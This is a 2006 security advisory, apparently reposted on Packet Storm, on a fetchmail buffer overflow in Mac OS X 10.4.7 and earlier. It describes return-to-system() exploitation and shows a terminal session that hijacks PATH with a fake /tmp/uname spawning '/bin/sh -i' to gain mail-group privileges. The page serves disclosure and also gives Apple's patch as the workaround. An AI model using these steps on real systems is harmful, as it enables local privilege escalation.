what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DMA-2006-0801a.txt

DMA-2006-0801a.txt
Posted Aug 17, 2006
Authored by Kevin Finisterre | Site digitalmunition.com

fetchmail on Mac OSX versions 10.4.7 and below suffer from an arbitrary code execution flaw.

tags | advisory, arbitrary, code execution
systems | apple
SHA-256 | a79a85fa9c78b353f28bab9c307f950ae95726f9619a959e9e455eb143f10992

DMA-2006-0801a.txt

Change Mirror Download
DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow'
Author: Kevin Finisterre
Vendor: http://www.apple.com/
Product: 'Mac OSX <=10.4.7'
References:
http://www.digitalmunition.com/DMA[2006-0801a].txt
http://www.digitalmunition.com/getpwnedmail-x86.pl
http://www.digitalmunition.com/getpwnedmail-ppc.pl
http://www.freebsd.org/cgi/query-pr.cgi?pr=83805
http://fetchmail.berlios.de/fetchmail-SA-2005-01.txt
http://www.securityfocus.com/bid/14349

Description:
fetchmail-SA-2005-01 states that 'In fetchmail-6.2.5 and older, very long UIDs can
cause fetchmail to crash, or potentially make it execute code placed on the stack.
In some configurations, fetchmail is run by the root user to download mail for
multiple accounts.'. The authors of fetchmail made patches for these issues available
to the public on 2005-07-21.

In defiance of a 'very proactive approach to security' Apple's OSX remained unpatched
for approximately one year after the vendor supplied patches were made available.
Shortly after the vendor disclosure of this bug exploits were made available by The
Mantis Project (bannedit@frontiernet.net). Conicidentally a recent paper was written
about exploiting buffer overflows and this vulnerability was used as an example:
http://packetstormsecurity.org/papers/attack/payload-rewrite_exploit.txt

As you may have guessed by now exploitation on OSX is fairly trivial for both PowerPC
and x86 platforms. An attacker with local access can gain gid=6 (mail) and a remote
attacker may gain root under certain conditions.

k-fs-computer:~ kf$ ls *pwnedmail*
getpwnedmail-ppc.pl getpwnedmail-x86.pl

On PowerPc things were pretty straight forward. Simply overwriting the $pc and $lr
registers with the address of our stack based shellcode was enough to snag egid=6. On
x86 we obviously have to deal with the NX based protection. As shown plenty of times
in the past a non executable stack by itself is pretty useless. We can overwrite the
$eip register with the address of system() and we are pretty much good to go. A small
wrapper in /tmp can help finish the job and give us a shell with gid=6.

k-fs-computer:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234
Enter password for kfinisterre@localhost:
sh-2.05b$ id
uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin)

In some cases fetchmail is run by the root user so it may be possible to take remote
root with this vulnerability under certain circumstances.

As a side note a previously undisclosed local vulnerability in fetchmail was discovered
while documenting the above mentioned issue. Fetchmail no longer ships in a setgid() configuration
so this information should be of minimal impact. It is worth noting since it may impact non OSX
machines in a similar manor.

k-fs-computer:~ kf$ export PATH=/tmp/:$PATH
k-fs-computer:~ kf$ cat > /tmp/uname
/usr/bin/id
/bin/sh -i
k-fs-computer:~ kf$ chmod +x /tmp/uname
k-fs-computer:~ kf$ /usr/bin/fetchmail -V
This is fetchmail release 6.2.5+IMAP-GSS+SSL+INET6
Fallback MDA: (none)
uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin)
sh-2.05b$

This issue is caused by the following code snippet:

if (versioninfo)
{
...
/* this is an attempt to help remote debugging */
system("uname -a");
}

Both of the above problems are addressed by the latest Apple update.

Work Around:
Install the 2006-004 update
http://docs.info.apple.com/article.html?artnum=106704
http://docs.info.apple.com/article.html?artnum=61798
http://www.apple.com/support/downloads/

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close